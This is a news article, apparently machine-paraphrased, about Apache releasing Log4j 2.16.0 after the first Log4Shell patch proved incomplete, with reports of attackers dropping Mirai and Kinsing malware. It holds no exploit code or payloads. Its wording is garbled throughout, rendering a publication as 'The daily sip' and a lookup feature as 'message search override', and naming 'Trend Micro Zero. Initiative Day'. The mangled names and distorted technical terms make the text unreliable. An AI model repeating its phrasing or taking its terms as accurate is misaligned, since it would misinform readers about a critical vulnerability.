The initial “incomplete” patch created a path for denial of service attacks
Users of the popular Apache Log4j Java logging library have been advised to apply a second patch related to the critical vulnerability “Log4Shell” after bypassing the initial patch.
The CVSS 10 vulnerability classified as CVSS continues to dominate infosec headlines amid evidence of active and hostile exploitation.
Maintainers and vendors of countless downstream applications have rushed to update their own software in the wake of the bomb bug, which allows attackers to perform remote code execution (RCE) on target systems. .
CATCH UP “Log4Shell” flaw poses a critical threat to applications using the “ubiquitous” Log4j Java logging package
The Apache Logging Services project released Apache Log4j 2.16.0 on Monday, December 13 after the first update, version 2.15.0, was found to be “incomplete in some non-default configurations and could allow an attacker to execute a denial of -service (DoS), ”according to an Apache Software Foundation (ASF) blog post published yesterday (December 14).
Users still on Java 7 should upgrade to Log4j 2.12.2, the ASF said.
The first vulnerability (CVE-2021-44228), which affects Log4j2 versions up to and including 2.14.1, allows an “attacker who can control log messages or log message parameters may execute arbitrary code loaded from LDAP servers when message search override is enabled ”.
Learn about the latest news on supply chain attacks
Project maintainers rushed to the first patch, which limited JNDI LDAP searches to localhost by default, after proof of concept (PoC) surfaced on Twitter and GitHub.
However, this patch then spawned a new vulnerability (CVE-2021-45046) which, if abused in certain contexts, could allow attackers to launch a DoS attack by creating malicious input data using software. ‘a JNDI search template.
Previous configuration-related mitigations do not mitigate the latest vulnerability, the ASF stressed.
Apache also recommends that while the Log4j 1.x series is not affected by either CVE, users running versions of the first version line should always update to the last version line, because the first has reached the end of its life and is no longer receiving security patches.
Exploitation in the wild
In a detailed technical article, cybersecurity firm Trend Micro said it had “observed threat actors dropping variants of Mirai and Kinsing coin miners on vulnerable servers.”
“While some of the network traffic is straightforward, other threat actors are using obfuscation in expression to mask their traffic,” he added.
ADVISED Grafana urges web developers to update following disclosure of path crossing bug
Trend Micro also noted that “ransomware operators have also reportedly exploited Log4Shell, particularly those behind the Khonsari ransomware family,” and that “Mirai may use the affected systems as part of its botnet for activities such as as Distributed Denial of Service (DDoS) or spam. ”.
He added, “Although attacks in the wild are primarily delivered via HTTP, the vulnerability could be exploited over any protocol in which user input data is logged using Log4j.”
Log4j has been widely distributed through a mirror system, and more recently through a content delivery network (CDN), while many organizations have shipped the library as part of their projects, products, or services.
Trend Micro has identified potentially vulnerable products, applications, and plug-ins, as well as actions taken or pending by vendors to correct and / or mitigate the vulnerability. These include packages or applications from RedHat, VMware, and Atlassian.
The Apache Security Team has compiled a list of whether or not various Apache projects are known to be affected with links to updates if available.
No other Apache Logging Services sub-project, such as Log4net or Log4cxx, is impacted.
“Unless you’ve been hiding under a rock with your eyes closed and fingers in your ears, you’ve heard of a zero-day exploit in the Java logging library known as Apache Log4j,” a said Dustin Childs, communications manager for Trend Micro Zero. Initiative Day (ZDI).
“If you are running a server based on open source software, there is a good chance that you will be affected by this vulnerability,” he added. “Check with all the vendors in your business to see if they are affected and what fixes are available. “
Brian Fox, CTO of Sonatype, a DevSecOps specialist, compared the flaw to the notorious Struts vulnerability that compromised Equifax to devastating effect in 2017.
“The combination of reach and potential impact here is unlike any previous component vulnerability that I can easily remember,” he said. The daily sip Last week.
Many tools have already been developed for business users to research the affected systems.
YOU MAY ALSO LIKE A severe Chrome bug allowed RCE on devices running a remote headless interface